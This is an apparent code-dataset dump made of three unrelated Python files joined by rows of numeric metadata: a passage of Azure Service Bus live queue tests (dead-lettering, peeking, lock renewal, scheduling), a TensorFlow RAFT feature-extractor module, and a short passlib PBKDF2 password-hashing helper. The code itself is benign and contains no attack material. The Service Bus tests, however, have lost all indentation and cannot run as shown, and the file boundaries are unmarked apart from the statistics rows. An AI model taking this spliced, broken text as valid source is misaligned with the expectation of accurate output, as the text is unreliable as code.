messages = receiver.fetch_next()
while messages:
for message in messages:
print_message(message)
count += 1
message.dead_letter(description="Testing")
messages = receiver.fetch_next()
assert count == 10
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
count = 0
for message in receiver:
print_message(message)
message.complete()
count += 1
assert count == 0
@pytest.mark.liveTest
def test_queue_by_servicebus_client_receive_batch_with_retrieve_deadletter(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=False)
queue_client = client.get_queue(standard_queue)
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock, prefetch=10) as receiver:
with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Dead lettered message no. {}".format(i))
sender.send(message)
count = 0
messages = receiver.fetch_next()
while messages:
for message in messages:
print_message(message)
message.dead_letter(description="Testing queue deadletter")
count += 1
messages = receiver.fetch_next()
with pytest.raises(InvalidHandlerState):
receiver.fetch_next()
assert count == 10
with queue_client.get_deadletter_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
count = 0
for message in receiver:
print_message(message)
message.complete()
count += 1
assert count == 10
@pytest.mark.liveTest
def test_queue_by_servicebus_client_session_fail(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=False)
queue_client = client.get_queue(standard_queue)
with pytest.raises(ValueError):
queue_client.get_receiver(session="test")
with queue_client.get_sender(session="test") as sender:
sender.send(Message("test session sender"))
@pytest.mark.liveTest
def test_queue_by_servicebus_client_browse_messages_client(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=False)
queue_client = client.get_queue(standard_queue)
with queue_client.get_sender() as sender:
for i in range(5):
message = Message("Test message no. {}".format(i))
sender.send(message)
messages = queue_client.peek(5)
assert len(messages) == 5
assert all(isinstance(m, PeekMessage) for m in messages)
for message in messages:
print_message(message)
with pytest.raises(TypeError):
message.complete()
@pytest.mark.liveTest
def test_queue_by_servicebus_client_browse_messages_with_receiver(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=False)
queue_client = client.get_queue(standard_queue)
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
with queue_client.get_sender() as sender:
for i in range(5):
message = Message("Test message no. {}".format(i))
sender.send(message)
messages = receiver.peek(5)
assert len(messages) > 0
assert all(isinstance(m, PeekMessage) for m in messages)
for message in messages:
print_message(message)
with pytest.raises(TypeError):
message.complete()
@pytest.mark.liveTest
def test_queue_by_servicebus_client_browse_empty_messages(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=False)
queue_client = client.get_queue(standard_queue)
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock, prefetch=10) as receiver:
messages = receiver.peek(10)
assert len(messages) == 0
@pytest.mark.liveTest
def test_queue_by_servicebus_client_fail_send_messages(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=False)
queue_client = client.get_queue(standard_queue)
too_large = "A" * 1024 * 512
try:
results = queue_client.send(Message(too_large))
except MessageSendFailed:
pytest.skip("Open issue for uAMQP on OSX")
assert len(results) == 1
assert not results[0][0]
assert isinstance(results[0][1], MessageSendFailed)
with queue_client.get_sender() as sender:
with pytest.raises(MessageSendFailed):
sender.send(Message(too_large))
with queue_client.get_sender() as sender:
sender.queue_message(Message(too_large))
results = sender.send_pending_messages()
assert len(results) == 1
assert not results[0][0]
assert isinstance(results[0][1], MessageSendFailed)
@pytest.mark.liveTest
def test_queue_by_servicebus_client_fail_send_batch_messages(live_servicebus_config, standard_queue):
pytest.skip("TODO: Pending bugfix in uAMQP")
def batch_data():
for i in range(3):
yield str(i) * 1024 * 256
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=False)
queue_client = client.get_queue(standard_queue)
results = queue_client.send(BatchMessage(batch_data()))
assert len(results) == 4
assert not results[0][0]
assert isinstance(results[0][1], MessageSendFailed)
with queue_client.get_sender() as sender:
with pytest.raises(MessageSendFailed):
sender.send(BatchMessage(batch_data()))
with queue_client.get_sender() as sender:
sender.queue_message(BatchMessage(batch_data()))
results = sender.send_pending_messages()
assert len(results) == 4
assert not results[0][0]
assert isinstance(results[0][1], MessageSendFailed)
@pytest.mark.liveTest
def test_queue_by_servicebus_client_renew_message_locks(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=False)
queue_client = client.get_queue(standard_queue)
messages = []
locks = 3
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock, prefetch=10) as receiver:
with queue_client.get_sender() as sender:
for i in range(locks):
message = Message("Test message no. {}".format(i))
sender.send(message)
messages.extend(receiver.fetch_next())
recv = True
while recv:
recv = receiver.fetch_next()
messages.extend(recv)
try:
assert not message.expired
for m in messages:
time.sleep(5)
initial_expiry = m.locked_until
m.renew_lock()
assert (m.locked_until - initial_expiry) >= timedelta(seconds=5)
finally:
messages[0].complete()
messages[1].complete()
time.sleep(30)
with pytest.raises(MessageLockExpired):
messages[2].complete()
@pytest.mark.liveTest
def test_queue_by_queue_client_conn_str_receive_handler_with_autolockrenew(live_servicebus_config, standard_queue):
queue_client = QueueClient.from_connection_string(
live_servicebus_config['conn_str'],
name=standard_queue,
debug=False)
with queue_client.get_sender() as sender:
for i in range(10):
message = Message("{}".format(i))
sender.send(message)
renewer = AutoLockRenew()
messages = []
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock, prefetch=10) as receiver:
for message in receiver:
if not messages:
messages.append(message)
assert not message.expired
renewer.register(message, timeout=60)
print("Registered lock renew thread", message.locked_until, datetime.now())
time.sleep(50)
print("Finished first sleep", message.locked_until)
assert not message.expired
time.sleep(25)
print("Finished second sleep", message.locked_until, datetime.now())
assert message.expired
try:
message.complete()
raise AssertionError("Didn't raise MessageLockExpired")
except MessageLockExpired as e:
assert isinstance(e.inner_exception, AutoLockRenewTimeout)
else:
if message.expired:
print("Remaining messages", message.locked_until, datetime.now())
assert message.expired
with pytest.raises(MessageLockExpired):
message.complete()
else:
assert message.header.delivery_count >= 1
print("Remaining messages", message.locked_until, datetime.now())
messages.append(message)
message.complete()
renewer.shutdown()
assert len(messages) == 11
@pytest.mark.liveTest
def test_queue_message_time_to_live(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=False)
import uuid
queue_client = client.get_queue(standard_queue)
with queue_client.get_sender() as sender:
content = str(uuid.uuid4())
message_id = uuid.uuid4()
message = Message(content)
message.time_to_live = timedelta(seconds=30)
sender.send(message)
time.sleep(30)
with queue_client.get_receiver() as receiver:
messages = receiver.fetch_next(timeout=10)
assert not messages
with queue_client.get_deadletter_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
count = 0
for message in receiver:
print_message(message)
message.complete()
count += 1
assert count == 1
@pytest.mark.liveTest
def test_queue_message_duplicate_detection(live_servicebus_config, duplicate_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=False)
import uuid
message_id = uuid.uuid4()
queue_client = client.get_queue(duplicate_queue)
with queue_client.get_sender() as sender:
for i in range(5):
message = Message(str(i))
message.properties.message_id = message_id
sender.send(message)
with queue_client.get_receiver(idle_timeout=5) as receiver:
count = 0
for message in receiver:
print_message(message)
assert message.properties.message_id == message_id
message.complete()
count += 1
assert count == 1
@pytest.mark.liveTest
def test_queue_message_connection_closed(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=False)
import uuid
queue_client = client.get_queue(standard_queue)
with queue_client.get_sender() as sender:
content = str(uuid.uuid4())
message = Message(content)
sender.send(message)
with queue_client.get_receiver() as receiver:
messages = receiver.fetch_next(timeout=10)
assert len(messages) == 1
with pytest.raises(MessageSettleFailed):
messages[0].complete()
@pytest.mark.liveTest
def test_queue_message_expiry(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=False)
import uuid
queue_client = client.get_queue(standard_queue)
with queue_client.get_sender() as sender:
content = str(uuid.uuid4())
message = Message(content)
sender.send(message)
with queue_client.get_receiver() as receiver:
messages = receiver.fetch_next(timeout=10)
assert len(messages) == 1
time.sleep(30)
assert messages[0].expired
with pytest.raises(MessageLockExpired):
messages[0].complete()
with pytest.raises(MessageLockExpired):
messages[0].renew_lock()
with queue_client.get_receiver() as receiver:
messages = receiver.fetch_next(timeout=30)
assert len(messages) == 1
print_message(messages[0])
assert messages[0].header.delivery_count > 0
messages[0].complete()
@pytest.mark.liveTest
def test_queue_message_lock_renew(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=False)
import uuid
queue_client = client.get_queue(standard_queue)
with queue_client.get_sender() as sender:
content = str(uuid.uuid4())
message = Message(content)
sender.send(message)
with queue_client.get_receiver() as receiver:
messages = receiver.fetch_next(timeout=10)
assert len(messages) == 1
time.sleep(15)
messages[0].renew_lock()
time.sleep(15)
messages[0].renew_lock()
time.sleep(15)
assert not messages[0].expired
messages[0].complete()
with queue_client.get_receiver() as receiver:
messages = receiver.fetch_next(timeout=10)
assert len(messages) == 0
@pytest.mark.liveTest
def test_queue_message_receive_and_delete(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=False)
queue_client = client.get_queue(standard_queue)
with queue_client.get_sender() as sender:
message = Message("Receive and delete test")
sender.send(message)
with queue_client.get_receiver(mode=ReceiveSettleMode.ReceiveAndDelete) as receiver:
messages = receiver.fetch_next(timeout=10)
assert len(messages) == 1
received = messages[0]
print_message(received)
with pytest.raises(MessageAlreadySettled):
received.complete()
with pytest.raises(MessageAlreadySettled):
received.abandon()
with pytest.raises(MessageAlreadySettled):
received.defer()
with pytest.raises(MessageAlreadySettled):
received.dead_letter()
with pytest.raises(MessageAlreadySettled):
received.renew_lock()
time.sleep(30)
with queue_client.get_receiver() as receiver:
messages = receiver.fetch_next(timeout=10)
for m in messages:
print_message(m)
assert len(messages) == 0
@pytest.mark.liveTest
def test_queue_message_batch(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=False)
queue_client = client.get_queue(standard_queue)
def message_content():
for i in range(5):
yield "Message no. {}".format(i)
with queue_client.get_sender() as sender:
message = BatchMessage(message_content())
sender.send(message)
with queue_client.get_receiver() as receiver:
messages =receiver.fetch_next(timeout=10)
recv = True
while recv:
recv = receiver.fetch_next(timeout=10)
messages.extend(recv)
assert len(messages) == 5
for m in messages:
print_message(m)
m.complete()
@pytest.mark.liveTest
def test_queue_schedule_message(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=False)
import uuid
queue_client = client.get_queue(standard_queue)
enqueue_time = (datetime.utcnow() + timedelta(minutes=2)).replace(microsecond=0)
with queue_client.get_receiver() as receiver:
with queue_client.get_sender() as sender:
content = str(uuid.uuid4())
message_id = uuid.uuid4()
message = Message(content)
message.properties.message_id = message_id
message.schedule(enqueue_time)
sender.send(message)
messages = receiver.fetch_next(timeout=120)
if messages:
try:
data = str(messages[0])
assert data == content
assert messages[0].properties.message_id == message_id
assert messages[0].scheduled_enqueue_time == enqueue_time
assert messages[0].scheduled_enqueue_time == messages[0].enqueued_time.replace(microsecond=0)
assert len(messages) == 1
finally:
for m in messages:
m.complete()
else:
raise Exception("Failed to receive schdeduled message.")
@pytest.mark.liveTest
def test_queue_schedule_multiple_messages(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=False)
import uuid
queue_client = client.get_queue(standard_queue)
enqueue_time = (datetime.utcnow() + timedelta(minutes=2)).replace(microsecond=0)
with queue_client.get_receiver(prefetch=20) as receiver:
with queue_client.get_sender() as sender:
content = str(uuid.uuid4())
message_id_a = uuid.uuid4()
message_a = Message(content)
message_a.properties.message_id = message_id_a
message_id_b = uuid.uuid4()
message_b = Message(content)
message_b.properties.message_id = message_id_b
tokens = sender.schedule(enqueue_time, message_a, message_b)
assert len(tokens) == 2
messages = receiver.fetch_next(timeout=120)
messages.extend(receiver.fetch_next(timeout=5))
if messages:
try:
data = str(messages[0])
assert data == content
assert messages[0].properties.message_id in (message_id_a, message_id_b)
assert messages[0].scheduled_enqueue_time == enqueue_time
assert messages[0].scheduled_enqueue_time == messages[0].enqueued_time.replace(microsecond=0)
assert len(messages) == 2
finally:
for m in messages:
m.complete()
else:
raise Exception("Failed to receive schdeduled message.")
@pytest.mark.liveTest
def test_queue_cancel_scheduled_messages(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=False)
queue_client = client.get_queue(standard_queue)
enqueue_time = (datetime.utcnow() + timedelta(minutes=2)).replace(microsecond=0)
with queue_client.get_receiver() as receiver:
with queue_client.get_sender() as sender:
message_a = Message("Test scheduled message")
message_b = Message("Test scheduled message")
tokens = sender.schedule(enqueue_time, message_a, message_b)
assert len(tokens) == 2
sender.cancel_scheduled_messages(*tokens)
messages = receiver.fetch_next(timeout=120)
try:
assert len(messages) == 0
except AssertionError:
for m in messages:
print(str(m))
m.complete()
raise
| 38.53816
| 133
| 0.677652
| 4,476
| 39,386
| 5.686327
| 0.058534
| 0.061803
| 0.08958
| 0.045262
| 0.82964
| 0.792079
| 0.772434
| 0.747878
| 0.727408
| 0.715347
| 0
| 0.010715
| 0.23224
| 39,386
| 1,021
| 134
| 38.575906
| 0.83098
| 0.007566
| 0
| 0.772885
| 0
| 0
| 0.04713
| 0.000665
| 0
| 0
| 0
| 0
| 0.11124
| 1
| 0.040556
| false
| 0.001159
| 0.019699
| 0
| 0.061414
| 0.035921
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
83e44c181f2054528369bc97abc8970b62e1c7e9
| 13,460
|
py
|
Python
|
smurf/smurf_models/raft_extractor.py
|
shaun95/google-research
|
d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5
|
[
"Apache-2.0"
] | 1
|
2022-03-13T21:48:52.000Z
|
2022-03-13T21:48:52.000Z
|
smurf/smurf_models/raft_extractor.py
|
shaun95/google-research
|
d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5
|
[
"Apache-2.0"
] | null | null | null |
smurf/smurf_models/raft_extractor.py
|
shaun95/google-research
|
d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5
|
[
"Apache-2.0"
] | 1
|
2022-03-30T07:20:29.000Z
|
2022-03-30T07:20:29.000Z
|
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implementation of RAFT."""
# pylint:skip-file
import tensorflow as tf
import tensorflow_addons as tfa
def create_extractor_Conv2d(c_in, c_out, k_size, stride=1):
kernel_scale = 2.0
if isinstance(k_size, list) or isinstance(k_size, tuple):
bias_scale = c_out / (3.0 * c_in * k_size[0] * k_size[1])
else:
bias_scale = c_out / (3.0 * c_in * k_size * k_size)
return tf.keras.layers.Conv2D(
filters=c_out,
kernel_size=k_size,
strides=stride,
kernel_initializer=tf.keras.initializers.VarianceScaling(
distribution='normal', scale=kernel_scale, mode='fan_out'),
bias_initializer=tf.keras.initializers.VarianceScaling(
distribution='uniform', scale=bias_scale, mode='fan_in'))
class ResidualBlock(tf.keras.layers.Layer):
def __init__(self, in_planes, planes, norm_fn='batch', stride=1, **kwargs):
super(ResidualBlock, self).__init__(**kwargs)
self.conv1 = create_extractor_Conv2d(
c_in=in_planes, c_out=planes, k_size=3, stride=stride)
self.conv2 = create_extractor_Conv2d(c_in=planes, c_out=planes, k_size=3)
self.relu = tf.keras.layers.ReLU()
num_groups = planes // 8
beta_initializer = 'zeros'
gamma_initializer = 'ones'
if norm_fn == 'group':
self.norm1 = tfa.layers.GroupNormalization(
groups=num_groups,
axis=-1,
epsilon=1e-5,
beta_initializer=beta_initializer,
gamma_initializer=gamma_initializer)
self.norm2 = tfa.layers.GroupNormalization(
groups=num_groups,
axis=-1,
epsilon=1e-5,
beta_initializer=beta_initializer,
gamma_initializer=gamma_initializer)
if stride != 1:
self.norm3 = tfa.layers.GroupNormalization(
groups=num_groups,
axis=-1,
epsilon=1e-5,
beta_initializer=beta_initializer,
gamma_initializer=gamma_initializer)
elif norm_fn == 'batch':
self.norm1 = tf.keras.layers.BatchNormalization(
epsilon=1e-5,
beta_initializer=beta_initializer,
gamma_initializer=gamma_initializer)
self.norm2 = tf.keras.layers.BatchNormalization(
epsilon=1e-5,
beta_initializer=beta_initializer,
gamma_initializer=gamma_initializer)
if stride != 1:
self.norm3 = tf.keras.layers.BatchNormalization(
epsilon=1e-5,
beta_initializer=beta_initializer,
gamma_initializer=gamma_initializer)
elif norm_fn == 'instance':
self.norm1 = tfa.layers.InstanceNormalization(
axis=3,
epsilon=1e-5,
center=False,
scale=False,
beta_initializer=beta_initializer,
gamma_initializer=gamma_initializer)
self.norm2 = tfa.layers.InstanceNormalization(
axis=3,
epsilon=1e-5,
center=False,
scale=False,
beta_initializer=beta_initializer,
gamma_initializer=gamma_initializer)
if stride != 1:
self.norm3 = tfa.layers.InstanceNormalization(
axis=3,
epsilon=1e-5,
center=False,
scale=False,
beta_initializer=beta_initializer,
gamma_initializer=gamma_initializer)
elif norm_fn == 'none':
self.norm1 = tf.keras.Sequential()
self.norm2 = tf.keras.Sequential()
if stride != 1:
self.norm3 = tf.keras.Sequential()
else:
raise Exception('norm_fn %s not implemented' % norm_fn)
if stride == 1:
self.downsample = tf.keras.Sequential()
else:
conv = create_extractor_Conv2d(
c_in=in_planes, c_out=planes, k_size=1, stride=stride)
self.downsample = tf.keras.Sequential(layers=[conv, self.norm3])
def call(self, x, training=True):
y = x
paddings = [[0, 0], [1, 1], [1, 1], [0, 0]]
y = tf.pad(y, paddings)
y = self.relu(self.norm1(self.conv1(y), training=training))
y = tf.pad(y, paddings)
y = self.relu(self.norm2(self.conv2(y), training=training))
x = self.downsample(x, training=training)
return self.relu(x + y)
class BottleneckBlock(tf.keras.layers.Layer):
def __init__(self, in_planes, planes, norm_fn='group', stride=1, **kwargs):
super(BottleneckBlock, self).__init__(**kwargs)
hidden_planes = planes // 4
self.conv1 = create_extractor_Conv2d(
c_in=in_planes, c_out=hidden_planes, k_size=1)
self.conv2 = create_extractor_Conv2d(
c_in=hidden_planes, c_out=hidden_planes, k_size=3, stride=stride)
self.conv3 = create_extractor_Conv2d(
c_in=hidden_planes, c_out=planes, k_size=1)
self.relu = tf.keras.layers.ReLU()
num_groups = planes // 8
beta_initializer = 'zeros'
gamma_initializer = 'ones'
if norm_fn == 'group':
self.norm1 = tfa.layers.GroupNormalization(
groups=num_groups,
axis=-1,
epsilon=1e-5,
beta_initializer=beta_initializer,
gamma_initializer=gamma_initializer)
self.norm2 = tfa.layers.GroupNormalization(
groups=num_groups,
axis=-1,
epsilon=1e-5,
beta_initializer=beta_initializer,
gamma_initializer=gamma_initializer)
self.norm3 = tfa.layers.GroupNormalization(
groups=num_groups,
axis=-1,
epsilon=1e-5,
beta_initializer=beta_initializer,
gamma_initializer=gamma_initializer)
if stride != 1:
self.norm4 = tfa.layers.GroupNormalization(
groups=num_groups,
axis=-1,
epsilon=1e-5,
beta_initializer=beta_initializer,
gamma_initializer=gamma_initializer)
elif norm_fn == 'batch':
self.norm1 = tf.keras.layers.BatchNormalization(
epsilon=1e-5,
beta_initializer=beta_initializer,
gamma_initializer=gamma_initializer)
self.norm2 = tf.keras.layers.BatchNormalization(
epsilon=1e-5,
beta_initializer=beta_initializer,
gamma_initializer=gamma_initializer)
self.norm3 = tf.keras.layers.BatchNormalization(
epsilon=1e-5,
beta_initializer=beta_initializer,
gamma_initializer=gamma_initializer)
if stride != 1:
self.norm4 = tf.keras.layers.BatchNormalization(
epsilon=1e-5,
beta_initializer=beta_initializer,
gamma_initializer=gamma_initializer)
elif norm_fn == 'instance':
self.norm1 = tfa.layers.InstanceNormalization(
axis=3,
epsilon=1e-5,
center=False,
scale=False,
beta_initializer=beta_initializer,
gamma_initializer=gamma_initializer)
self.norm2 = tfa.layers.InstanceNormalization(
axis=3,
epsilon=1e-5,
center=False,
scale=False,
beta_initializer=beta_initializer,
gamma_initializer=gamma_initializer)
self.norm3 = tfa.layers.InstanceNormalization(
axis=3,
epsilon=1e-5,
center=False,
scale=False,
beta_initializer=beta_initializer,
gamma_initializer=gamma_initializer)
if stride != 1:
self.norm4 = tfa.layers.InstanceNormalization(
axis=3,
epsilon=1e-5,
center=False,
scale=False,
beta_initializer=beta_initializer,
gamma_initializer=gamma_initializer)
elif norm_fn == 'none':
self.norm1 = tf.keras.Sequential()
self.norm2 = tf.keras.Sequential()
self.norm3 = tf.keras.Sequential()
if stride != 1:
self.norm4 = tf.keras.Sequential()
else:
raise Exception('norm_fn %s not implemented' % norm_fn)
if stride == 1:
self.downsample = tf.keras.Sequential()
else:
conv = create_extractor_Conv2d(
c_in=in_planes, c_out=planes, k_size=1, stride=stride)
self.downsample = tf.keras.Sequential(layers=[conv, self.norm4])
def call(self, x, training=True):
y = x
paddings = [[0, 0], [1, 1], [1, 1], [0, 0]]
y = self.relu(self.norm1(self.conv1(y), training=training))
y = tf.pad(y, paddings)
y = self.relu(self.norm2(self.conv2(y), training=training))
y = self.relu(self.norm3(self.conv3(y), training=training))
x = self.downsample(x, training=training)
return self.relu(x + y)
class BasicEncoder(tf.keras.layers.Layer):
def __init__(self, output_dim=128, norm_fn='none', dropout=0.0, **kwargs):
super(BasicEncoder, self).__init__(**kwargs)
self.norm_fn = norm_fn
beta_initializer = 'zeros'
gamma_initializer = 'ones'
if norm_fn == 'group':
self.norm1 = tfa.layers.GroupNormalization(
groups=8,
axis=-1,
epsilon=1e-5,
beta_initializer=beta_initializer,
gamma_initializer=gamma_initializer)
elif norm_fn == 'batch':
self.norm1 = tf.keras.layers.BatchNormalization(
epsilon=1e-5,
beta_initializer=beta_initializer,
gamma_initializer=gamma_initializer)
elif norm_fn == 'instance':
self.norm1 = tfa.layers.InstanceNormalization(
axis=-1,
epsilon=1e-5,
center=False,
scale=False,
beta_initializer=beta_initializer,
gamma_initializer=gamma_initializer)
elif norm_fn == 'none':
self.norm1 = tf.keras.Sequential()
else:
raise Exception('norm_fn %s not implemented' % norm_fn)
self.conv1 = create_extractor_Conv2d(c_in=3, c_out=64, k_size=7, stride=2)
self.relu1 = tf.keras.layers.ReLU()
self.in_planes = 64
self.layer1 = self._make_layer(64, stride=1)
self.layer2 = self._make_layer(96, stride=2)
self.layer3 = self._make_layer(128, stride=2)
self.conv2 = create_extractor_Conv2d(c_in=128, c_out=output_dim, k_size=1)
if dropout > 0:
self.dropout = tf.keras.layers.Dropout(rate=dropout)
else:
self.dropout = tf.keras.Sequential()
# initialize according to RAFT
def _make_layer(self, dim, stride=1):
layer1 = ResidualBlock(self.in_planes, dim, self.norm_fn, stride=stride)
layer2 = ResidualBlock(dim, dim, self.norm_fn, stride=1)
layers = [layer1, layer2]
self.in_planes = dim
return tf.keras.Sequential(layers=layers)
def call(self, x, training=True):
paddings = [[0, 0], [3, 3], [3, 3], [0, 0]]
x = tf.pad(x, paddings=paddings)
x = self.conv1(x)
x = self.norm1(x, training=training)
x = self.relu1(x)
x = self.layer1(x, training=training)
x = self.layer2(x, training=training)
x = self.layer3(x, training=training)
x = self.conv2(x)
x = self.dropout(x, training=training)
return x
class SmallEncoder(tf.keras.layers.Layer):
def __init__(self, output_dim=128, norm_fn='batch', dropout=0.0, **kwargs):
super(SmallEncoder, self).__init__(**kwargs)
self.norm_fn = norm_fn
beta_initializer = 'zeros'
gamma_initializer = 'ones'
if norm_fn == 'group':
self.norm1 = tfa.layers.GroupNormalization(
groups=8,
axis=-1,
epsilon=1e-5,
beta_initializer=beta_initializer,
gamma_initializer=gamma_initializer)
elif norm_fn == 'batch':
self.norm1 = tf.keras.layers.BatchNormalization(
epsilon=1e-5,
beta_initializer=beta_initializer,
gamma_initializer=gamma_initializer)
elif norm_fn == 'instance':
self.norm1 = tfa.layers.InstanceNormalization(
axis=-1,
epsilon=1e-5,
center=False,
scale=False,
beta_initializer=beta_initializer,
gamma_initializer=gamma_initializer)
elif norm_fn == 'none':
self.norm1 = tf.keras.Sequential()
else:
raise Exception('norm_fn %s not implemented' % norm_fn)
self.conv1 = create_extractor_Conv2d(c_in=3, c_out=32, k_size=7, stride=2)
self.relu1 = tf.keras.layers.ReLU()
self.in_planes = 32
self.layer1 = self._make_layer(32, stride=1)
self.layer2 = self._make_layer(64, stride=2)
self.layer3 = self._make_layer(96, stride=2)
self.conv2 = create_extractor_Conv2d(c_in=96, c_out=output_dim, k_size=1)
def _make_layer(self, dim, stride=1):
layer1 = BottleneckBlock(self.in_planes, dim, self.norm_fn, stride=stride)
layer2 = BottleneckBlock(dim, dim, self.norm_fn, stride=1)
layers = [layer1, layer2]
self.in_planes = dim
return tf.keras.Sequential(layers=layers)
def call(self, x, training=True):
paddings = [[0, 0], [3, 3], [3, 3], [0, 0]]
x = tf.pad(x, paddings=paddings)
x = self.conv1(x)
x = self.norm1(x, training=training)
x = self.relu1(x)
x = self.layer1(x, training=training)
x = self.layer2(x, training=training)
x = self.layer3(x, training=training)
x = self.conv2(x)
return x
| 33.071253
| 78
| 0.643462
| 1,692
| 13,460
| 4.933806
| 0.106974
| 0.104217
| 0.174653
| 0.097029
| 0.849665
| 0.834811
| 0.821155
| 0.781624
| 0.770963
| 0.75012
| 0
| 0.029638
| 0.245468
| 13,460
| 406
| 79
| 33.152709
| 0.79234
| 0.048217
| 0
| 0.81155
| 0
| 0
| 0.021345
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033435
| false
| 0
| 0.006079
| 0
| 0.072948
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
79354fe3191e9c9186db7af328903a5fdb5ce02f
| 230
|
py
|
Python
|
server/core/passwords.py
|
vgamula/sp
|
16e1dcbf15c1a76d44b15bc914a001167a43c05e
|
[
"MIT"
] | null | null | null |
server/core/passwords.py
|
vgamula/sp
|
16e1dcbf15c1a76d44b15bc914a001167a43c05e
|
[
"MIT"
] | null | null | null |
server/core/passwords.py
|
vgamula/sp
|
16e1dcbf15c1a76d44b15bc914a001167a43c05e
|
[
"MIT"
] | null | null | null |
from passlib.hash import pbkdf2_sha256
def generate_password(password: str) -> str:
return pbkdf2_sha256.hash(password)
def check_password(password: str, hash: str) -> bool:
return pbkdf2_sha256.verify(password, hash)
| 23
| 53
| 0.76087
| 31
| 230
| 5.483871
| 0.451613
| 0.211765
| 0.223529
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.060914
| 0.143478
| 230
| 9
| 54
| 25.555556
| 0.80203
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 1
| 0.2
| 0.4
| 1
| 0
| 0
| 0
| 0
